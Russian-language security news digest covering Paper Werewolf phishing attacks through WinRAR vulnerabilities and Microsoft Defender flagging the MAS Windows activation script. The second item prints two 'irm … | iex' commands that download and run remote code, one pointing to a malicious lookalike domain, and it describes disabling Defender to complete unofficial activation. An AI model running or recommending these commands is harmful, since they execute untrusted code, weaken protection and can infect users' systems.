Paper Werewolf использовала дыры в WinRAR для атак на компании в России

Paper Werewolf использовала дыры в WinRAR для атак на компании в России

Paper Werewolf использовала дыры в WinRAR для атак на компании в России

Почти 80% российских компаний пользуются WinRAR — и именно через него в июле и начале августа прошли атаки шпионской кибергруппировки Paper Werewolf. Злоумышленники рассылали фишинговые письма с RAR-архивами — якобы с важными документами, но на деле внутри была вредоносная программа. При распаковке архива вирус незаметно устанавливался на компьютер.

Как объясняет Олег Скулкин, руководитель направления Threat Intelligence в BI.ZONE, такие группировки постоянно ищут новые уязвимости и методы проникновения.

В этом случае архивы решали сразу две задачи: обходили почтовые фильтры (вложение выглядит как обычный документ) и позволяли установить вредоносный код через уязвимости в WinRAR.

Одной из целей Paper Werewolf стал российский производитель спецоборудования. Письмо выглядело официально: отправитель — крупный научно-исследовательский институт, а письмо пришло с адреса реальной мебельной компании, которую предварительно взломали. Внутри архива — «документы от министерства» и XPS Viewer. Эта программа сама по себе легитимная, но её исполняемый файл был подменён — в него внедрили вредоносный код, который давал злоумышленникам удалённый доступ к заражённому устройству.

Для атаки использовали уязвимость CVE-2025-6218, которая затрагивает версии WinRAR до 7.11 включительно. В последующих атаках применили уже уязвимость нулевого дня — пока не описанную официально. Она затрагивает и более новую версию WinRAR 7.12. Интересно, что незадолго до этого на теневом форуме появилось объявление о продаже рабочего эксплойта, предположительно именно для этой уязвимости. Продавец хотел за него $80 000.

Согласно данным BI.ZONE TDR, WinRAR установлен почти на всех корпоративных Windows-устройствах в России. Архиватор по-прежнему крайне популярен: каждый месяц продаётся около 10 000 лицензий.

BI.ZONE также отмечает, что с начала 2025 года 36% всех кибератак на российские организации были связаны с промышленным шпионажем. Paper Werewolf — одна из тех групп, кто активно этим занимается.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru